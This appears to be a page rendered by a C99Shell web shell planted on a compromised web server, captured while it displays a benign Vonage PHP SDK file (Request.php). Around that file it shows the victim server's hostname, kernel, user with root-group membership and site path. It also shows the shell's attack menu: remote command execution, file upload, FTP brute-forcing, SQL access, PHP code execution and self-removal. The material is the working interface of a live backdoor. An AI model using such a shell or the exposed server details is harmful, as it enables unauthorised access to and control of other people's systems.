!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/vonage/client-core/src/Network/Number/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Request.php (1.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Vonage\Network\Number;

use 
Vonage\Client\Request\AbstractRequest;
use 
Vonage\Client\Request\WrapResponseInterface;
use 
Vonage\Client\Response\Error;
use 
Vonage\Client\Response\ResponseInterface;

use function 
implode;

class 
Request extends AbstractRequest implements WrapResponseInterface
{
    public const 
FEATURE_TYPE 'type';
    public const 
FEATURE_VALID 'valid';
    public const 
FEATURE_REACHABLE 'reachable';
    public const 
FEATURE_CARRIER 'carrier';
    public const 
FEATURE_PORTED 'ported';
    public const 
FEATURE_ROAMING 'roaming';
    public const 
FEATURE_SUBSCRIBER 'subscriber';

    
/**
     * @var array
     */
    
protected $params;

    public function 
__construct($number$callback, array $features = [], $timeout null$method null$ref null)
    {
        
$this->params['number'] = $number;
        
$this->params['callback'] = $callback;
        
$this->params['callback_timeout'] = $timeout;
        
$this->params['callback_method'] = $method;
        
$this->params['client_ref'] = $ref;

        if (!empty(
$features)) {
            
$this->params['features'] = implode(','$features);
        }
    }

    public function 
getURI(): string
    
{
        return 
'/ni/json';
    }

    public function 
wrapResponse(ResponseInterface $response): ResponseInterface
    
{
        if (
$response->isError()) {
            return new 
Error($response->getData());
        }

        return new 
Response($response->getData());
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--